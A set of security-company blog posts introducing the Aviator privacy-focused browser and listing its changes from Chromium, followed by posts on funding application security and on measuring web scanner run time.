Fair point. Like we’ve said, Aviator started off as an internal project simply to protect WhiteHat employees, and is not an official company “product.” Those outside the company asked if they could use the same browser that we do; Aviator is our answer to that. Since we’re not in the advertising and tracking business, how could we say no? At some point in the future we’ll figure out a way to generate revenue from Aviator, but in the meantime, we’re mostly interested in offering a browser that security- and privacy-conscious people want to use.

Have you gotten any feedback from the major browser vendors about Aviator? If so, what has it been?

We have not received any official feedback from any of the major browser vendors, though some feedback from various employees of those vendors has been shared informally over Twitter. Some of it has been positive, some negative. In either case, we’re most interested in serving the everyday consumer.

Keep the questions and feedback coming and we will continue to endeavor to improve Aviator in ways that will be beneficial to the security community and to the average consumer.

What’s the Difference between Aviator and Chromium / Google Chrome?

Context:

It’s a fundamental rule of Web security: a Web browser must be able to defend itself against a hostile website. Presently, in our opinion, the market-share-leading browsers cannot do this adequately. This is an everyday threat to the personal security and privacy of the more than one billion people online, ourselves included. We’ve long held and shared this point of view at WhiteHat Security. Like any sufficiently large company, we have many internal staff members who aren’t as tech savvy as WhiteHat’s Threat Research Center, so we had the same kind of security problem as the rest of the industry: we had to rely on educating our users, because no browser on the market was suitable for our security needs. But education is a flawed approach – there are always new users and new security guidelines. So instead of engaging in a lengthy educational campaign, we began designing an internal browser that would be secure and privacy-protecting enough for our own users by default. Over the years a great many people – friends, family members, and colleagues alike – have asked us what browser we recommend, even what browser their children should use. Aviator became our answer.

Why Aviator:

The attacks a website can generate against a visiting browser are diverse and complex, but they can be broadly categorized into two types. The first type of attack is designed to escape the confines of the browser walls and infect the desktop with malware. Today’s top-tier browser defenses include software security in the browser core, an accompanying sandbox, URL blacklists, silent updates, and plug-in click-to-play. The well-known browser vendors have done a great job in this regard and should be commended. No one wins when users’ desktops become part of a botnet.

Unfortunately, the second type of browser attack has been left largely undefended. These attacks are pernicious and carry out their exploits within the browser walls. They typically don’t implant malware, but they are indeed hazardous to online security and privacy. I’ve previously written up a lengthy 8-part blog post series on the subject documenting the problems. For a variety of reasons, these issues have not been addressed by the leading browser vendors. Rather than continue asking for updates that would likely never come, we decided we could do it ourselves.

To create Aviator we leveraged open source Chromium, the same browser core used by Google Chrome. Then, because Chromium’s BSD license allows it, we made many very particular changes to the code and configuration to enhance security and privacy. We named our product Aviator. Many people are eager to learn exactly what the differences are, so let’s go over them.

Differences:

  1. Protected Mode (Incognito Mode) / Not Protected Mode:
    TL;DR All Web history, cache, cookies, auto-complete, and local storage data is deleted after restart.
    Most people are unaware that there are 12 or more locations in which websites may store cookie and cookie-like data in a browser. Cookies are typically used to track your surfing habits from one website to the next, but they also expose your online activity to nosy people with access to your computer. Protected Mode purges these storage areas automatically with each browser restart. While other browsers have this feature or something similar, it is not enabled by default, which can make it a chore to use. Aviator launches directly into Protected Mode by default and clearly indicates the mode of the current window. The security / privacy side effect of Protected Mode also helps protect against browser auto-complete hacking, login detection, and deanonymization via clickjacking by reducing the number of session states you have open – a result of the browser’s intentional lack of persistence across sessions.
  2. Connection Control: 
    TL;DR Rules for controlling the connections made by Aviator. By default, Aviator blocks intranet IP addresses (RFC 1918).
    When you visit a website, it can instruct your browser to make potentially dangerous connections to internal IP addresses on your network – addresses that could not otherwise be reached from the outside (NAT). Exploitation may lead to simple reconnaissance of internal networks, or it may permanently compromise your network, for example by overwriting the firmware on your router. Without installing special third-party software, it’s impossible to block Web code from carrying out browser-based intranet hacking. If Aviator happens to be blocking something you want to reach, Connection Control allows you to create custom rules – or temporarily use another browser.
  3. Disconnect bundled (Disconnect.me): 
    TL;DR Blocks ads and 3rd-party trackers.

    Essentially every ad on every website your browser encounters is tracking you, storing bits of information about where you go and what you do. These ads, along with invisible 3rd-party trackers, also often carry malware designed to exploit your browser when you load a page, or to trick you into installing something should you choose to click on it. Since ads can be authored by anyone, including attackers, both ads and trackers may also harness your browser to hack other systems, hack your intranet, incriminate you, and so on. And of course the visuals in the ads themselves are often distasteful, offensive, or inappropriate, especially for children. To help protect against tracking, login detection and deanonymization, auto cross-site scripting, drive-by downloads, and evil cross-site request forgery delivered through malicious ads, we bundled in the Disconnect extension, which is specifically designed to block ads and trackers. According to the Chrome web store, over 400,000 people are already using Disconnect to protect their privacy. Whether you use Aviator or not, we recommend that you use Disconnect too (Chrome / Firefox supported). We understand many publishers depend on advertising to fund their content. They must also understand that many who use ad-blocking software aren’t necessarily anti-advertising, but rather pro security and privacy. Ads are dangerous. Publishers should simply ask visitors to enable ads on the website to support the content they want to see – something Disconnect’s icon makes easy to do with a couple of mouse clicks. This puts the power and the choice into the hands of the user, which is where we believe it should be.
  4. Block 3rd-party Cookies: 
    TL;DR Default configuration update. 

    While it’s very nice that cookies, including 3rd-party cookies, are deleted when the browser is closed, it’s even better when 3rd-party cookies are not allowed in the first place. Blocking 3rd-party cookies helps protect against tracking, login detection, and deanonymization during the current browser session.
  5. DuckDuckGo replaces Google search: 
    TL;DR Privacy enhanced replacement for the default search engine. 

    It is well known that Google search makes the company billions of dollars annually via user advertising and user tracking / profiling. DuckDuckGo promises exactly the opposite: “Search anonymously. Find instantly.” We felt that was a much better default option. Of course, if you prefer another search engine (including Google), you are free to change the setting.
  6. Limit Referer Leaks: 
    TL;DR Referers no longer leak cross-domain, but are only sent same-domain by default. 

    When you click from one page to the next, browsers tell the destination website where the click came from via the Referer header (the misspelling is part of the HTTP standard). Doing so can leak sensitive information contained in the referring URL – search keywords, internal IPs/hostnames, session tokens, and so on – while offering little, if any, benefit to the user. Aviator therefore only sends these headers within the same domain.
  7. Plug-Ins Click-to-Play: 
    TL;DR Default configuration update enabled by default. 

    Plug-ins (e.g. Flash and Java) are a source of tracking, malware exploitation, and general annoyance. Plug-ins often keep their own storage for cookie-like data, which isn’t easy to delete, especially from within the browser. Plug-ins are also a huge attack vector for malware infection: your browser might be secure, but the plug-ins are not, and one must update them constantly. Then of course there are all the annoying sounds and visuals made by plug-ins, which are difficult to identify and block once they load. So we blocked them all by default. When you want to run a plug-in, say on YouTube, just click on the puzzle piece. If you want a website to always load its plug-ins, that’s a configuration change as well: “Always allow plug-ins on…”
  8. Limit data leakage to Google: 
    TL;DR Default configuration update.

    In Aviator we’ve disabled “Use a web service to help resolve navigation errors” and “Use a prediction service to help complete searches and URLs typed in the address bar” by default. We also removed all options to sync / log in to Google, and the tracking traffic sent to Google upon Chromium installation. For many of the same reasons that we default to DuckDuckGo as the search engine, we have limited what the browser sends to Google to protect your privacy. If you choose to use Google services, that is your choice. If you choose not to, though, opting out can be difficult in some browsers. Again, our mantra is choice – and this gives you the choice.
  9. Do Not Track: 
    TL;DR Default configuration update.

    Enabled by default. While we prefer “Can-Not-Track” to “Do-Not-Track”, we figured it was safe enough to enable the “Do Not Track” signal by default in the event it gains traction.

So far we have appreciated the response to WhiteHat Aviator, and we welcome additional questions and feedback. Our goal is to continue to make this a better and more secure browser option for consumers. Please continue to spread the word and share your thoughts with us, and please download Aviator and give it a test run. Let us know what you think! Click here to learn more about the Aviator browser.

Introducing WhiteHat Aviator – A Safer Web Browser

Jeremiah Grossman and I have been publicly discussing browser security and privacy, or the lack thereof, for many years. We’ve shared the issues hundreds of times at conferences, in blog posts, on Twitter, in white papers, and in the press. As the adage goes, “If you’re not paying for something, you’re not the customer; you’re the product being sold.” Browsers are no different, and the major vendors (Google, Mozilla, Microsoft) simply don’t want to make the changes necessary to offer a satisfactorily secure and private browser.

Before I go any further, it’s important to understand that it’s NOT that the browser vendors (Google, Mozilla, and Microsoft) don’t grasp or appreciate what plagues their software. They understand the issues quite well. Most of the time they actually nod their heads and even agree with us! This naturally invites the question: “why aren’t the necessary changes made to fix things and protect people?”

The answer is simple: browser vendors (Google, Mozilla, and Microsoft) choose not to make these changes because doing so would risk hurting their market share and their ability to make money. You see, offering what we believe is a reasonably secure and privacy-protecting browser requires breaking the Web – only a little, and in ways few people would notice, but breaking it nonetheless. As just one example of many, let’s discuss the removal of ads.

The online advertising industry is promoted as a means of helping businesses reach an interested target audience. But tens of millions of people find these ads to be annoying at best, and many find them highly objectionable. The targeting and the assumptions behind it are often at fault: children may be exposed to ads for adult sites, and the targeting is often based on bias and stereotypes that can cause offense. Moreover, these ads can be used to track you across the web, are often laden with malware, and can point those who click on them to scams.

One would think that people who don’t want to click on ads are not the kind of people the ad industry wants anyway. So if browser vendors offered a feature capable of blocking ads by default, it would increase user satisfaction for millions, provide a more secure and privacy-protecting online experience, and ensure that advertisements were seen by people who would react positively, rather than negatively, to them. And yet not a single browser vendor offers ad blocking, instead relying on optional third-party plugins, because doing so would break their business model and how they make money. The current incentives between user and browser vendor are misaligned. People simply aren’t safe online when their browser vendor profits from ads.

I could go on and give a dozen more examples like this, but rather than continue beating a drum that no one with the power to make changes is willing to listen to, we decided it was time to draw a line in the sand and start making the Web work the way we think it should: a way that protects people. With that said, I want to share publicly for the first time some details about WhiteHat Aviator, our own full-featured web browser, which until now was a top-secret internal project from our WhiteHat Security Labs team. Originally, Aviator started out as an experiment by our Labs team to test our many Web security and privacy theories; today, Aviator is the browser given to all WhiteHat employees. Jeremiah, I, and many others at WhiteHat use Aviator daily as our primary browser. We’re often asked by those outside the company what browser we use, to which we have answered, “our own.” After years of research, development, and testing, we’ve finally arrived at a version that’s mature enough for public consumption (OS X). Now you can use the same browser that we do.

WhiteHat Security has no interest or stake in the online advertising industry, so we can offer a browser free of ulterior motives. What you see is what you get. We aren’t interested in tracking you or your browsing history, or in letting anyone else have that information either.

Aviator is designed for the everyday person who really values their online security and privacy:

  • We bundled Aviator with Disconnect to remove ads and tracking
  • Aviator is always in private mode
  • Each tab is sandboxed (a sandbox provides controls to help prevent one program from making changes to others, or to your environment)
  • We strip out referring URLs across domains to protect your privacy
  • Flash and Java are click-to-play – greatly reducing the risk of drive-by downloads
  • We block access to websites behind your firewall to prevent Intranet hacking

Default settings in Aviator are set to protect your security and your privacy.

We hope you enjoy using Aviator as much as we’ve enjoyed building it. If people like it, we will create a Windows version as well and we’ll add additional privacy and security features. Please download it and give it a test run. Let us know what you think! Click here to learn more about the Aviator browser.

Upcoming SANS Webcast: Convincing Management to Fund Application Security

Many security departments struggle tirelessly to obtain adequate budget for security, especially application security. It’s also no secret that security spending priorities are often grossly misaligned with respect to how businesses invest in IT. This is something I’ve discussed on my blog many times in the past.

The sheer lack of resources is a key reason why Web applications have been wide open to exploitation for as long as they’ve existed, and why companies are constantly getting hacked. While many in the industry understand the problem, they struggle to justify the level of funding necessary to protect the software their organizations build or license.

In December 2012, the SANS Institute conducted a survey of 700 organizations on app security programs and practices. That survey revealed that the primary barriers to implementing secure app management programs were “lack of management funding/buy-in,” followed by lack of resources and skills. Those two are pretty closely aligned, don’t you think?

A 2013 Microsoft survey obtained similar results. In it, more than 2,200 IT professionals and 490 developers worldwide were asked about secure development life cycle processes. The top barriers they cited were lack of management approval, lack of training and support, and cost. It’s time we start developing tools and strategies to begin solving this problem.

In a recent CSO article, SANS’ John Pescatore made some excellent points about how security people need to start approaching their relationships with management. Instead of sounding the alarm, they need to focus more on providing solutions. Let’s say that again: bring management BUSINESS SOLUTIONS and not just the problems. John correctly states that a CEO thinks in terms of opportunity costs, so security people need to use a similar mindset when strategizing a budget conversation with a CEO. Doing so does wonders.

Obviously, that’s not nearly enough of an answer to get a productive conversation started. We security people need more examples, business models, cost models, ROI models, real-world case studies, and so on. This will be the topic of a webcast I’m co-presenting with John Pescatore, hosted by SANS, on September 19 at 1pm EDT (10am PDT). If you’d like to come and hear us go over the material, we’d love to have you there! Or skip the webcast and just read this whitepaper on the topic.

How Fast is Your Scanner?

Apparently there is some confusion amongst people who are new to web application scanning regarding the “time it takes for a scan to run.” That metric is typically perceived as a delta between the time at which the scanner starts running and the time at which the scanner completes. However, in reality there are different methods of tracking how long a scanner takes to complete, and some are more thorough than others. Probably the two most common methods of thinking about tracking this time are as follows:

  1. The time it takes between when the scanner is started and the time at which the scanner stops.
  2. The time between when the customer begins the process of setting up to be scanned and when results have been delivered to the customer with all false positives removed.

The disparity between these two measurements can be massive, both in elapsed time and in people’s perception of how long a scan takes.

Unfortunately, there are many variables in this equation which can skew people’s perception of time when making a mental calculation of how long something has taken:

  1. Is this the first time the customer has ever worked with the scanning vendor – meaning early implementation may be messy (sharing credentials, finding the right assets, giving access to machines, and so on)? The first scan may also require meeting hardware and operating system requirements, installing software, licensing, and procuring hardware.
  2. Does the scanner require you to manually kick it off each time you want it to run? This can add quite a bit of overhead, simply by not continuously running.
  3. Is there only one site or are there many sites that need to be tested – meaning that there could be a significant advantage involved in a cloud-based scanner where parallelism is easily achieved, compared to a desktop scanner?
  4. Is this internal or external or both – meaning that there may be some VPN or virtual appliance needs involved in setting up and tearing down the scanner? That adds an unknown amount of time, due to the fact that credentials can expire over time, and sometimes it can be quite an ordeal to get login information.
  5. Does the vendor remove false positives for the customer – meaning that if they do not, is there an extra hidden cost for the customer after results have been received?
  6. Does the scanner require manual updating – meaning that between runs or before each run, does it require an update to ensure the latest test cases are being used? This can take minutes to hours depending on a number of variables such as: how easy it is to patch, whether or not the customer or a third party is handling manual updates, what level of access is required, how to share credentials and so on.
  7. Does the vendor integrate with internal trouble ticketing, or does that require manual intervention to copy each vuln and paste it into the trouble ticketing system to begin triaging the vuln?

When timing a scanner it is important to take into account the actual overhead, and therefore the cost, of running the scanner. Rather than looking at any one abstract metric, a more thorough analysis is better at identifying cost. So perhaps in the future we should ask a more relevant and useful question: instead of “how long does the scanner take to run?” we should ask, “how long does it take for us to take action on our actual vulnerabilities using this scanner?”